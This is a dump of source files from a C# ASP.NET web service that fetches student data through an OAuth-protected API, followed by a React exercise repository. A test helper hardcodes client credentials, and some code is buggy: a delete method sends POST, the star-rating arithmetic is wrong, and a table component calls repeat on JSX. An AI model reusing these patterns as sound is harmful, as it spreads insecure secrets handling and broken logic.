_httpClientMock.Verify(x => x.PostAsync(It.IsAny<Uri>(), It.IsAny<HttpContent>())); _responseContentMock.Verify(x => x.ReadAsStringAsync()); 
Assert.IsFalse(string.IsNullOrWhiteSpace(token)); } [TestMethod()] public void GetAsyncTest() { // Arrange _responseContentMock.Setup(x => x.ReadAsStringAsync()).Returns(GetStudent); _httpClientMock.Setup(x => x.GetAsync(It.IsAny<Uri>())).Returns(GetResponse); // Act var response = WebServiceClient.GetAsync(); // Assert _httpClientMock.Verify(x => x.GetAsync(It.IsAny<Uri>())); _responseContentMock.Verify(x => x.ReadAsStringAsync()); Assert.IsNotNull(response); } [TestMethod()] public void PostAsyncTest() { // Arrange _responseContentMock.Setup(x => x.ReadAsStringAsync()).Returns(GetStudent); _httpClientMock.Setup(x => x.PostAsync(It.IsAny<Uri>(), It.IsAny<HttpContent>())).Returns(GetResponse); // Act var response = WebServiceClient.PostAsync(new List<ChildInfo>()); // Assert _httpClientMock.Verify(x => x.PostAsync(It.IsAny<Uri>(),It.IsAny<HttpContent>())); _responseContentMock.Verify(x => x.ReadAsStringAsync()); Assert.IsNotNull(response); } [TestMethod()] public void PutAsyncTest() { // No requirement for Put Assert.IsTrue(true); } [TestMethod()] public void DeleteAsyncTest() { // No requirement for Delete Assert.IsTrue(true); } private async Task<HttpResponseMessage> GetResponse() { var requestMessage = new HttpRequestMessage(); requestMessage.RequestUri=new Uri("http://localhost/api/student?endpoint=abc"); var response = new HttpResponseMessage { StatusCode = HttpStatusCode.OK, RequestMessage = requestMessage }; return response; } private async Task<string> GetToken() { const string response = "{\"access_token\":\"abcde\",\"token_type\":\"bearer\",\"expires_in\":86399,\"refresh_token\":\"<PASSWORD>\"}"; return response; } private async Task<string> GetStudent() { var student = new ChildInfo(); var result = JsonConvert.SerializeObject(student); return result; } } } <file_sep>using System; using System.Configuration; using System.Threading.Tasks; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; namespace 
PCG.GOAL.ExternalDataService.Service
{
    /// <summary>
    /// IGoalService implementation that queries the Rethink REST API for student data.
    /// </summary>
    public class RethinkGoalService : IGoalService
    {
        public Credentials Credentials { get; set; }

        private readonly IWebServiceClient<ChildInfo> _apiClient;

        public IServiceConfig ServiceConfig { get; set; }

        /// <summary>
        /// Wires the service to an API client. When no usable configuration is supplied
        /// (null, or missing ApiKey), settings are read from Web.config instead.
        /// </summary>
        public RethinkGoalService(IWebServiceClient<ChildInfo> apiClient, IServiceConfig serviceConfig = null)
        {
            _apiClient = apiClient;
            // A configuration without an ApiKey is unusable; treat it as "not supplied".
            ServiceConfig = (serviceConfig == null || string.IsNullOrWhiteSpace(serviceConfig.ApiKey))
                ? SetServiceConfig()
                : serviceConfig;
            _apiClient.BaseUri = ServiceConfig.BaseUrl;
        }

        /// <summary>Fetches every student visible to the configured API key.</summary>
        public async Task<ResponseData<ChildInfo>> GetAllStudentsAsync()
        {
            _apiClient.ServiceEndpoint = string.Format("{0}?apikey={1}",
                ServiceConfig.ServiceEndpoint, ServiceConfig.ApiKey);
            var response = await _apiClient.GetAsync();
            return response;
        }

        /// <summary>Fetches a single student by state test number.</summary>
        public async Task<ResponseData<ChildInfo>> GetStudentByStateNumberAsync(string stateTestNumber)
        {
            // Escape the caller-supplied value so reserved characters ('&', '=', spaces)
            // cannot corrupt the query string; null is treated as empty, as string.Format did.
            _apiClient.ServiceEndpoint = string.Format("{0}?apikey={1}&statetestnumber={2}",
                ServiceConfig.ServiceEndpoint, ServiceConfig.ApiKey,
                Uri.EscapeDataString(stateTestNumber ?? string.Empty));
            _apiClient.IsSingleResult = true;
            var response = await _apiClient.GetAsync();
            return response;
        }

        /// <summary>
        /// Fetches a single student by name and date of birth.
        /// Date of Birth should be passed in YYYYMMDD format.
        /// </summary>
        public async Task<ResponseData<ChildInfo>> GetStudentByIdentityAsync(string firstName, string lastName, string dob)
        {
            // Names may contain spaces or apostrophes; escape each value for safe URL transport.
            _apiClient.ServiceEndpoint = string.Format("{0}?apikey={1}&firstname={2}&lastname={3}&dob={4}",
                ServiceConfig.ServiceEndpoint, ServiceConfig.ApiKey,
                Uri.EscapeDataString(firstName ?? string.Empty),
                Uri.EscapeDataString(lastName ?? string.Empty),
                Uri.EscapeDataString(dob ?? string.Empty));
            _apiClient.IsSingleResult = true;
            var response = await _apiClient.GetAsync();
            return response;
        }

        /// <summary>Builds a ServiceConfig from the Rethink_* keys in Web.config.</summary>
        private ServiceConfig SetServiceConfig()
        {
            var serviceConfig = new ServiceConfig
            {
                BaseUrl = GetFromServiceConfig("Rethink_BaseUrl"),
                ServiceEndpoint = GetFromServiceConfig("Rethink_StudentEndpoint"),
                ApiKey = GetFromServiceConfig("Rethink_ApiKey")
            };
            return serviceConfig;
        }

        /// <summary>Reads a required appSettings value; throws when it is absent or blank.</summary>
        private string GetFromServiceConfig(string key)
        {
            // todo: Rethink service configuration might be read from database instead of from Web.config
// todo: this depends on requirement var value = ConfigurationManager.AppSettings[key]; if (string.IsNullOrWhiteSpace(value)) { throw new Exception("Failed to read Rethink Service Configuration."); } return value; } } } <file_sep>using System; using System.Web; using Microsoft.Web.Infrastructure.DynamicModuleHelper; using Ninject; using Ninject.Extensions.Conventions; using Ninject.Web.Common; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.ExternalDataService.Service; using PCG.GOAL.WebService; /**/ [assembly: WebActivatorEx.PreApplicationStartMethod(typeof(NinjectWebCommon), "Start")] [assembly: WebActivatorEx.ApplicationShutdownMethodAttribute(typeof(NinjectWebCommon), "Stop")] namespace PCG.GOAL.WebService { public static class NinjectWebCommon { private static readonly Bootstrapper bootstrapper = new Bootstrapper(); /// <summary> /// Starts the application /// </summary> public static void Start() { DynamicModuleUtility.RegisterModule(typeof(OnePerRequestHttpModule)); DynamicModuleUtility.RegisterModule(typeof(NinjectHttpModule)); bootstrapper.Initialize(CreateKernel); } /// <summary> /// Stops the application. /// </summary> public static void Stop() { bootstrapper.ShutDown(); } /// <summary> /// Creates the kernel that will manage your application. /// </summary> /// <returns>The created kernel.</returns> private static IKernel CreateKernel() { var kernel = new StandardKernel(); try { kernel.Bind<Func<IKernel>>().ToMethod(ctx => () => new Bootstrapper().Kernel); kernel.Bind<IHttpModule>().To<HttpApplicationInitializationHttpModule>(); RegisterServices(kernel); WebApiApplication.Kernel = kernel; return kernel; } catch { kernel.Dispose(); throw; } } /// <summary> /// Load your modules or register your services here! 
/// </summary> /// <param name="kernel">The kernel.</param> private static void RegisterServices(IKernel kernel) { kernel.Bind(x => { x.FromThisAssembly() // Scans currently assembly .SelectAllClasses() // Retrieve all non-abstract classes .BindDefaultInterface(); // Binds the default interface to them; }); kernel.Bind<IGoalService>().To<RethinkGoalService>(); kernel.Bind(typeof(IWebServiceClient<>)).To(typeof(WebServiceClient<>)); kernel.Bind<IServiceConfig>().To<ServiceConfig>(); kernel.Bind<IDbService>().To<DbService>(); kernel.Bind<IOAuthValidator>().To<OAuthValidator>(); kernel.Bind<ISqlDataAccess>().To<SqlDataAccess>(); } } } <file_sep>(function () { angular.module("webServices").config(configRoute); function configRoute($stateProvider, $urlRouterProvider) { $stateProvider .state('home', { url: "/" }) .state("credentials", { url: "/user", templateUrl: "/AppRoot/admin/userAdmin.html" }) .state("credentialsEdit", { url: "/credentials/:id", templateUrl: "/AppRoot/admin/userEdit.html" }) .state("clientApp", { url: "/app", templateUrl: "/AppRoot/admin/appAdmin.html" }) .state("clientAppEdit", { url: "/appedit/:id", templateUrl: "/AppRoot/admin/appEdit.html" }); $urlRouterProvider.otherwise('/user'); } })();<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Net.Http; using System.Net.Http.Headers; using System.Text; using System.Threading.Tasks; namespace PCG.GOAL.ExternalDataService.Interface { public interface IClient { HttpClient HttpClient { get; set; } void SetAuthorization(AuthenticationHeaderValue header); void SetMediaType(MediaTypeWithQualityHeaderValue mediaType); Task<HttpResponseMessage> GetAsync(Uri uri); Task<HttpResponseMessage> PostAsync(Uri uri, HttpContent content); Task<HttpResponseMessage> PutAsync(Uri uri, HttpContent content); } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Net.Http; using System.Net.Http.Headers; using System.Text; using 
System.Threading.Tasks; using Newtonsoft.Json; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class WebServiceClient<T> : IWebServiceClient<T> where T : class { #region Properties public Func<Credentials> SetCredentials { get; set; } public Action<string> LogError { get; set; } public Credentials Credentials { get; set; } public bool IsSingleResult { get; set; } public string BaseUri { get; set; } public string TokenEndpoint { get; set; } public string ServiceEndpoint { get; set; } public IClient HttpClient { get; set; } public IContent ResponseContent { get; set; } private Uri ServiceEndpointUri { get { return GetUri(EndpointType.ServiceEndpoint, ServiceEndpoint); } } private Uri TokenEndpointUri { get { return GetUri(EndpointType.TokenEndpoint, TokenEndpoint); } } #endregion #region Constructor public WebServiceClient() { HttpClient = new Client<T>(); ResponseContent = new Content<T>(); } public WebServiceClient(IClient client, IContent content) { HttpClient = client; ResponseContent = content; } #endregion #region Public Methods public string GetToken() { try { var postBody = string.Format("username={0}&password={1}&grant_type={2}", Credentials.Username, Credentials.Password, GrantTpype.Password); var authentication = Convert.ToBase64String(Encoding.ASCII.GetBytes(String.Format("{0}:{1}", Credentials.ClientId, Credentials.ClientSecret))); HttpContent requestContent = new StringContent(postBody, Encoding.UTF8, "application/x-www-form-urlencoded"); HttpClient.SetAuthorization(new AuthenticationHeaderValue("Basic", authentication)); var response = HttpClient.PostAsync(TokenEndpointUri, requestContent).Result; if (response.IsSuccessStatusCode) { using (ResponseContent.HttpContent = response.Content) { var tokenResponse = ResponseContent.ReadAsStringAsync().Result; var token = JsonConvert.DeserializeObject<Token>(tokenResponse); return token.AccessToken; } } } catch 
(HttpRequestException hre) { LogErrorMessage(hre.Message); } catch (TaskCanceledException taskCanceledException) { LogErrorMessage(taskCanceledException.Message); } catch (Exception ex) { LogErrorMessage(ex.Message); } LogErrorMessage("Failed to get token, check your credentials!"); return ""; } public async Task<ResponseData<T>> GetAsync(string token = null) { return await ServiceAction(token, ServiceActionType.Get); } public async Task<ResponseData<T>> PostAsync(IEnumerable<T> records, string token = null) { return await ServiceAction(token, ServiceActionType.Post, records); } public async Task<ResponseData<T>> PutAsync(IEnumerable<T> records, string token = null) { return await ServiceAction(token, ServiceActionType.Put, records); } public async Task<ResponseData<T>> DeleteAsync(IEnumerable<T> records, string token = null) { return await ServiceAction(token, ServiceActionType.Delete, records); } #endregion #region Sevice Calls private async Task<ResponseData<T>> ServiceAction(string token = null, ServiceActionType serviceActionType = ServiceActionType.Get, IEnumerable<T> records = null) { var postBody = records == null ? 
string.Empty : JsonConvert.SerializeObject(records); HttpContent requestContent = new StringContent(postBody, Encoding.UTF8, "application/json"); var responseData = new ResponseData<T> { Done = false, Data = null, StatusCode = "", Message = "" }; try { if (!string.IsNullOrEmpty(token)) { HttpClient.SetAuthorization(new AuthenticationHeaderValue("Bearer", token)); } HttpClient.SetMediaType(new MediaTypeWithQualityHeaderValue("application/json")); HttpResponseMessage response; switch (serviceActionType) { case ServiceActionType.Get: response = await HttpClient.GetAsync(ServiceEndpointUri); break; case ServiceActionType.Post: response = await HttpClient.PostAsync(ServiceEndpointUri, requestContent); break; case ServiceActionType.Put: response = await HttpClient.PutAsync(ServiceEndpointUri, requestContent); break; case ServiceActionType.Delete: response = await HttpClient.PostAsync(ServiceEndpointUri, requestContent); break; default: // Get response = await HttpClient.GetAsync(ServiceEndpointUri); break; } responseData = GetResponse(response); } catch (HttpRequestException ex) { LogErrorMessage(ex.Message); throw; } catch (Exception exception) { LogErrorMessage(exception.Message); } return responseData; } private ResponseData<T> GetResponse(HttpResponseMessage response) { var failedEndpoint = "service endpoint"; if (response.RequestMessage != null && response.RequestMessage.ToString().IndexOf("?", StringComparison.Ordinal)>0) { failedEndpoint=response.RequestMessage.ToString().Split('?')[0]; } var responseData = new ResponseData<T> { Done = false, Data = null, StatusCode = response.StatusCode.ToString(), Message = string.Format("{0} -- Failed to get data from {1}", response.ReasonPhrase, failedEndpoint) }; using (response) { if (response.IsSuccessStatusCode) { using (ResponseContent.HttpContent = response.Content) { var result = ResponseContent.ReadAsStringAsync().Result; if (IsSingleResult) { var record = JsonConvert.DeserializeObject<T>(result); if (record != null) { 
responseData.Done = true; responseData.Message = "OK"; responseData.Data = new List<T> { record }; } } else { var record = JsonConvert.DeserializeObject<IEnumerable<T>>(result); if (record != null) { responseData.Done = true; responseData.Message = "OK"; responseData.Data = (IList<T>)record; } } } var message = response.ReasonPhrase == "OK" ? string.Empty : ", " + response.ReasonPhrase; if (responseData.Done != true) { responseData.Message = responseData.Message + message; } } } return responseData; } #endregion #region Private Helper Methods private void LogErrorMessage(string msg) { if (LogError == null) { Console.WriteLine(msg); } else { LogError(msg); } } private enum EndpointType { ServiceEndpoint, TokenEndpoint } private Uri GetUri(EndpointType endpointType, string endpoint) { try { var baseUri = new Uri(BaseUri); return new Uri(baseUri, endpoint); } catch (UriFormatException ex) { throw new Exception(string.Format("Please check the format of BaseUri and {0}", endpointType), ex); } } #endregion } } <file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.WebModels { public class ResponseData<T> { public bool Done { get; set; } public IList<T> Data { get; set; } public string Message { get; set; } public string StatusCode { get; set; } } } <file_sep>using System; using Microsoft.AspNet.Identity; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.DataAccess { public class OAuthValidator : IOAuthValidator { private readonly IDbService _dbService; public OAuthValidator(IDbService dbService) { _dbService = dbService; } public bool ValidateClient(string clientId, string clientSecret) { var client = _dbService.GetClientInfo(clientId); return (client != null && VerifyHashedPassword(client.ClientSecret, clientSecret)); } public Credentials ValidateUser(string username, string password) { var credentials = _dbService.GetCredentials(username); if (credentials != null && VerifyHashedPassword(credentials.Password, 
password)) { return credentials; } return null; } public bool VerifyHashedPassword(string hashedPassword, string password) { var passwordHasher = new PasswordHasher(); try { return passwordHasher.VerifyHashedPassword(hashedPassword, password)==PasswordVerificationResult.Success; } catch (Exception) { return false; } } } } <file_sep>(function () { angular.module("webServices", ['ui.router', 'ui.bootstrap']) .run(function ($rootScope, $state) { $rootScope.$state = $state; }); })(); (function () { var app = angular.module("webServices"); var dataServicePrefix = "/api/"; var config = { docTitle: "Goal Web Service", dataServicePrefix: dataServicePrefix, dataServicePath: buildDataServicePath, cacheMaxAge: 5000, enableConsoleLog: true, enableToastrLog: true, version: '1.0.0' }; function buildDataServicePath(endPoint,prefix) { if (!endPoint) { throw "End Point Is Empty!!"; } endPoint = buildPath(endPoint.trim()); if (!prefix) { prefix = dataServicePrefix; } else { prefix = buildPath(prefix); } return prefix + endPoint; } function buildPath(path) { if (path.indexOf('/') === 0) { path = path.substr(1); } if (path.indexOf('/') === path.length - 1) { path = path.substr(0, path.length - 1); } return path; } app.value("config", config); app.factory("logService", [function() { return { logError: function(data,disableToastr) { if (config.enableConsoleLog) { console.log("message: " + data.message + "\n" + "exceptionType: " + data.exceptionType + "\n" + "exceptionMessage: " + data.exceptionMessage); } if (config.enableToastrLog && !disableToastr) { if (data && data.exceptionMessage) { toastr.error(data.exceptionMessage); } else { toastr.error("An error has occurred."); } } } }; }]); app.config(["$logProvider", function($logProvider) { // turn debugging off/on if ($logProvider.debugEnabled) { $logProvider.debugEnabled(true); } }]); app.config([ "$httpProvider", function($httpProvider) { $httpProvider.defaults.withCredentials = true; } ]); })();<file_sep>using 
Microsoft.VisualStudio.TestTools.UnitTesting; using System.Data; using System.Data.SqlClient; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.Interface; using PCG.GOAL.WebService.Controllers; namespace PCG.GOAL.WebService.Test.Controllers { [TestClass()] public class AdminControllerTests { private IDbService _dbService; private ServiceAdminController _adminController; private SqlConnection _sqlConnection; [TestInitialize] public void TestInitialize() { _sqlConnection =new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename=D:\Dev\2015\gvtrunk\gvtrunk\web_root\wsRethink\PCG.GOAL.WebService\App_Data\GoalServiceDb.mdf;Integrated Security=True"); _dbService = new DbService(new SqlDataAccess(_sqlConnection)); _adminController = new ServiceAdminController(_dbService); } [TestMethod()] public void GetCredentialsTest() { var result = _adminController.GetCredentials(); Assert.IsNotNull(result); } } } <file_sep>using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.WebService.Test.WebClient { public class OAuthAccess { public Credentials GetCredentials() { // todo: get credentials from db var credentials = new Credentials { ClientId = "goalview", ClientSecret = "goalview", Username = "admin", Password = "<PASSWORD>" }; return credentials; } } }<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.Interface { public interface IDbService { Credentials GetCredentials(string username); Credentials GetCredentialsById(int id); IEnumerable<Credentials> GetAllCredentials(); void AddCredentials(Credentials credentials); void UpdateCredentials(Credentials credentials); void DeleteCredentials(int id); ClientInfo GetClientInfo(string clientId); ClientInfo GetClientInfoById(int id); IEnumerable<ClientInfo> GetAllClientInfo(); void AddClientInfo(ClientInfo clientInfo); void UpdateClientInfo(ClientInfo clientInfo); void DeleteClientInfo(int id); } 
} <file_sep>using System; using System.Collections.Generic; using System.Data.Entity; using System.Data.Entity.Infrastructure; using System.Linq; using System.Linq.Expressions; using System.Threading.Tasks; using DataAccess.Common.Interfaces; namespace DataAccess.Common.Services { /// <summary> /// The EF-dependent, generic repository for data access /// </summary> /// <typeparam name="T">Type of entity for this Repository.</typeparam> public class EFRepository<T> : IRepository<T> where T : class { public EFRepository(DbContext dbContext) { if (dbContext == null) throw new ArgumentNullException("dbContext"); DbContext = dbContext; DbSet = DbContext.Set<T>(); } protected DbContext DbContext { get; set; } protected DbSet<T> DbSet { get; set; } public virtual IQueryable<T> GetAll() { return DbSet; } public virtual T GetById(int id) { return DbSet.Find(id); } public virtual void Add(T entity) { DbEntityEntry dbEntityEntry = DbContext.Entry(entity); if (dbEntityEntry.State != EntityState.Detached) { dbEntityEntry.State = EntityState.Added; } else { DbSet.Add(entity); } } public virtual void Update(T entity) { DbEntityEntry dbEntityEntry = DbContext.Entry(entity); if (dbEntityEntry.State == EntityState.Detached) { DbSet.Attach(entity); } dbEntityEntry.State = EntityState.Modified; } public virtual void Delete(T entity) { DbEntityEntry dbEntityEntry = DbContext.Entry(entity); if (dbEntityEntry.State != EntityState.Deleted) { dbEntityEntry.State = EntityState.Deleted; } else { DbSet.Attach(entity); DbSet.Remove(entity); } } public virtual void Delete(int id) { var entity = GetById(id); if (entity == null) return; // not found; assume already deleted. 
Delete(entity); } public IQueryable<T> Find(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.Where(where); } public T Single(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.Single(where); } public T First(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.FirstOrDefault(where); } public Task<T> FirstAsync(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.FirstOrDefaultAsync(where); } private static IQueryable<T> PerformInclusions(IEnumerable<Expression<Func<T, object>>> includeProperties, IQueryable<T> query) { return includeProperties.Aggregate(query, (current, includeProperty) => current.Include(includeProperty)); } } } <file_sep>using System; using System.Collections.Generic; using System.Configuration; using System.Data; using System.Data.SqlClient; using System.Linq; namespace DataAccess.Common.Services { public class SqlDataAccess : IDisposable { private const string SqlConnectionKey = "SQLConn"; public SqlDataAccess() { try { Connection = new SqlConnection(ConfigurationManager.ConnectionStrings[SqlConnectionKey].ToString()); } catch (Exception e) { throw new Exception(string.Format("Failed to read connection string '{0}'", SqlConnectionKey), e); } } public SqlDataAccess(SqlConnection connection) { this.Connection = connection; } public SqlConnection Connection { get; set; } protected SqlTransaction Transaction { get; set; } public void OpenConnection() { if (this.Connection == null) { throw new 
Exception("Connection has not been initialized!"); } if (this.Connection.State == ConnectionState.Closed) { this.Connection.Open(); } } private SqlCommand NewCommand(string storedPorc, CommandType commandType = CommandType.StoredProcedure) { var command = new SqlCommand { Connection = this.Connection, CommandType = commandType, CommandText = storedPorc, CommandTimeout = 400000 }; if (this.Transaction != null) command.Transaction = this.Transaction; return command; } public SqlDataReader GetReader(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(storedProcedureKey)) { if (parameters != null) { command.Parameters.AddRange(parameters.ToArray()); } return closeConnection ? command.ExecuteReader(CommandBehavior.CloseConnection) : command.ExecuteReader(); } } public SqlDataReader GetReaderBySql(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(sqlStatement, CommandType.Text)) { return closeConnection ? 
command.ExecuteReader(CommandBehavior.CloseConnection) : command.ExecuteReader(); } } public DataTable GetTableBySql(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = NewCommand(sqlStatement, CommandType.Text)) { var reader = command.ExecuteReader(CommandBehavior.CloseConnection); var table = new DataTable(); table.Load(reader); return table; } } public object GetScalar(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(storedProcedureKey)) { if (parameters != null) { command.Parameters.AddRange(parameters.ToArray()); } var ret = command.ExecuteScalar(); if (closeConnection) { this.Connection.Close(); } return ret; } } public object GetScalar(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(sqlStatement, CommandType.Text)) { var ret = command.ExecuteScalar(); if (closeConnection) { this.Connection.Close(); } return ret; } } public int ExecuteNonQuery(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(storedProcedureKey)) { if (parameters != null) { command.Parameters.AddRange(parameters.ToArray()); } int ret = command.ExecuteNonQuery(); if (parameters != null) { foreach (SqlParameter p in command.Parameters) { if (p.Direction == ParameterDirection.Output) { parameters.First(pr => pr.ParameterName == p.ParameterName).Value = p.Value; } } } if (closeConnection) { this.Connection.Close(); } return ret; } } public int ExecuteNonQuery(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(sqlStatement, CommandType.Text)) { int ret = command.ExecuteNonQuery(); if (closeConnection) { this.Connection.Close(); } return ret; } } public void BulkCopy(string targetTable, DataTable data, 
bool closeConnection = true, Dictionary<string, string> mappings = null) { this.OpenConnection(); using (var bulkCopy = new SqlBulkCopy(this.Connection)) { bulkCopy.DestinationTableName = targetTable; if (mappings == null) { for (var i = 0; i < data.Columns.Count; ++i) { bulkCopy.ColumnMappings.Add(data.Columns[i].ColumnName, data.Columns[i].ColumnName); } } else { foreach (var pair in mappings) { bulkCopy.ColumnMappings.Add(pair.Value, pair.Key); } } bulkCopy.WriteToServer(data); } if (closeConnection) this.Connection.Close(); } protected T GetSafeValue<T>(IDataRecord record, string field) { if (record[field] is DBNull) return default(T); return (T)record[field]; } protected T? GetSafeNullable<T>(IDataRecord record, string field) where T : struct { if (record[field] is DBNull) return null; return (T?)record[field]; } public static string GetSafeString(IDataRecord record, string field) { if (record[field] is DBNull) return null; return record[field].ToString(); } public void Dispose() { if (this.Connection != null) { if (this.Connection.State != ConnectionState.Closed) { this.Connection.Close(); } this.Connection.Dispose(); } GC.SuppressFinalize(this); } } } <file_sep>namespace PCG.GOAL.Common.Models { public class BehaviorObjective { public string ObjectiveText { get; set; } public BehaviorMasteryCriteria MasteryCriteria { get; set; } } }<file_sep> using System.Net; using System.Net.Http; using System.Web.Http; using System.Web.Http.Controllers; namespace PCG.GOAL.WebService.Security { public class ApiAuthorizeAttribute : AuthorizeAttribute { protected override void HandleUnauthorizedRequest(HttpActionContext actionContext) { actionContext.Response = actionContext.Request.CreateResponse(HttpStatusCode.Unauthorized); actionContext.Response.ReasonPhrase = "Unauthorized Web Service Request"; base.HandleUnauthorizedRequest(actionContext); } } }
25f1828e68bfb73d69b1518b1c1735e4a4f5fece
[ "JavaScript", "C#" ]
50
C#
niceliubing/PCG.GOAL
fb52ceee2ac9881d8eb6633aff28c5f657e3f3e1
f862aa937fe014a9bfad69091198bd845af5a387
refs/heads/master
<repo_name>jennifervphan/lab-react-training<file_sep>/starter-code/src/pages/RandomPage.jsx import React, { Component } from 'react' import Random from '../components/Random.jsx' export default class RandomPage extends Component { render() { return ( <div> <Random min={1} max={6}/> <Random min={1} max={100}/> </div> ) } } <file_sep>/starter-code/src/pages/DriverPage.jsx import React, { Component } from 'react'; import DriverCard from '../components/DriverCard.jsx'; import '../components/DriverCard.css' export default class DriverPage extends Component { render() { return ( <div class="drivers"> <DriverCard name="<NAME>" rating={4.2} img="https://si.wsj.net/public/resources/images/BN-TY647_37gql_OR_20170621052140.jpg?width=620&height=428" car={{ model: "Toyota Corolla Altis", licensePlate: "CO42DE" }} /> <DriverCard name="<NAME>" rating={4.9} img="https://ubernewsroomapi.10upcdn.com/wp-content/uploads/2017/09/Dara_ELT_Newsroom_1000px.jpg" car={{ model: "Audi A3", licensePlate: "BE33ER" }} /> </div> ) } } <file_sep>/starter-code/src/components/IdCard.js import React,{Component} from 'react'; import './IdCard.css'; class IdCard extends Component{ render(){ debugger const {picture,lastName,firstName,gender,height,birth} =this.props; return ( <div className="idCard"> <img src={picture} alt=""></img> <div> <p>Last Name: <span>{lastName}</span></p> <p>First Name: <span>{firstName}</span></p> <p>Gender: <span>{gender}</span></p> <p>Height: <span>{height}cm</span></p> <p>Birthday: <span>{birth}</span></p> </div> </div> ) } } export default IdCard <file_sep>/starter-code/src/pages/NumbersTablePage.jsx import React, { Component } from 'react'; import NumbersTable from '../components/NumbersTable.jsx'; export default class NumbersTablePage extends Component { render() { return ( <div> <NumbersTable limit={12} /> </div> ) } } <file_sep>/starter-code/src/components/Routes.jsx import React, { Component } from 'react'; import {Route} from 'react-router-dom'; import IdCardPage from 
"../pages/IdCardPage.jsx"; import GreetingsPage from '../pages/GreetingsPage.jsx'; import RandomPage from '../pages/RandomPage.jsx'; import BoxcolorPage from '../pages/BoxcolorPage.jsx'; import CreditcardPage from '../pages/CreditcardPage.jsx'; import RatingPage from '../pages/RatingPage'; import DriverPage from '../pages/DriverPage'; import LikePage from '../pages/LikePage'; import ClickablePage from '../pages/ClickablePage.jsx'; import DicePage from '../pages/DicePage.jsx'; import CarouselPage from '../pages/CarouselPage.jsx'; import NumbersTablePage from '../pages/NumbersTablePage'; export default class Routes extends Component { render() { return ( <div> <Route path = "/idCard" component ={IdCardPage}/> <Route path="/greetings" component ={GreetingsPage}/> <Route path="/random" component ={RandomPage}/> <Route path="/boxcolor" component ={BoxcolorPage}/> <Route path="/creditcard" component ={CreditcardPage}/> <Route path="/rating" component ={RatingPage}/> <Route path="/driverCard" component ={DriverPage}/> <Route path="/like" component ={LikePage}/> <Route path="/clickable" component ={ClickablePage}/> <Route path="/dice" component ={DicePage}/> <Route path="/carousel" component ={CarouselPage}/> <Route path="/numbersTable" component ={NumbersTablePage}/> </div> ) } } <file_sep>/starter-code/src/components/Random.jsx import React, { Component } from 'react' export default class Random extends Component { render() { const {min, max}=this.props; let randomNum=Math.floor(Math.random()*max + min); return ( <div> <h3>Random value between {min} and {max} => {randomNum}</h3> </div> ) }}<file_sep>/starter-code/src/components/DriverCard.jsx import React, { Component } from 'react'; import Rating from './Rating'; import './DriverCard.css'; export default class DriverCard extends Component { render() { debugger const {name, rating, img, car} = this.props; return ( <div className="driverCard"> <div> <img src={img} alt=""></img> </div> <div> <h1>{name}</h1> 
<Rating>{rating}</Rating> <p>{car.model}-{car.licensePlate}</p> </div> </div> ) } } <file_sep>/starter-code/src/pages/BoxcolorPage.jsx import React, { Component } from 'react'; import BoxColor from '../components/BoxColor.jsx' export default class BoxcolorPage extends Component { render() { return ( <div> <BoxColor r={255} g={0} b={0} /> <BoxColor r={128} g={255} b={0} /> </div> ) } } <file_sep>/starter-code/src/components/Rating.jsx import React, { Component } from 'react' export default class Rating extends Component { render() { let rate =this.props.children; let blackNumber ; if (rate%rate > 0.5){ blackNumber= Math.ceil(rate); } else{ blackNumber=Math.floor(rate); } debugger let whiteNumber=5-blackNumber; let whitestars= ("☆").repeat(whiteNumber) let blackstars= ("★").repeat(blackNumber) let stars=blackstars+whitestars; return ( <div> <h1>{stars}</h1> </div> ) } } <file_sep>/starter-code/src/pages/ClickablePage.jsx import React, { Component } from 'react'; import ClickablePicture from '../components/ClickablePicture.jsx'; export default class ClickablePage extends Component { render() { return ( <ClickablePicture img="/img/persons/maxence.png" imgClicked="/img/persons/maxence-glasses.png" /> ) } } <file_sep>/starter-code/src/pages/RatingPage.jsx import React, { Component } from 'react'; import Rating from '../components/Rating.jsx'; export default class RatingPage extends Component { render() { return ( <div> <Rating>0</Rating> <Rating>1.49</Rating> <Rating>1.5</Rating> <Rating>3</Rating> <Rating>4</Rating> <Rating>5</Rating> </div> ) } } <file_sep>/starter-code/src/components/NumbersTable.jsx import React, { Component } from 'react' export default class NumbersTable extends Component { numberOfDivs=(limit)=>{ let divs=( <div>2</div> ).repeat(limit); return divs; } render() { const {limit}=this.props; debugger return ( <div> {this.numberOfDivs(limit)} </div> ) } } 